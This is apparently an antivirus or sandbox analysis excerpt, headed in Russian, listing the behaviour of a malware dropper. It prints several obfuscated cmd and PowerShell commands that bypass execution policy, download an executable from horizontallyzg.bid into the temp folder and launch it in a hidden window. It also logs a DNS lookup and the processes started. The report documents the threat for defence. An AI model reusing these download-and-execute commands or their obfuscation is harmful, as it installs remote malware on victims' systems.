Техническая информация
- '<SYSTEM32>\cmd.exe' /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'horizontallyzg.bid/etatdevaud/','%TEMP%\vodla.exe')...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1916
- %TEMP%\1088964.cvr
- DNS ASK ho####ntallyzg.bid
- '<SYSTEM32>\cmd.exe' /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'horizontallyzg.bid/etatdevaud/','%TEMP%\vodla.exe')...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl'+'oadfile').invoke('ht'+'tp://'+'horizontallyzg.bid/etatdevaud/','%TEMP%\vodla.exe');starT-ProCEss '%TEMP%\vodla.e...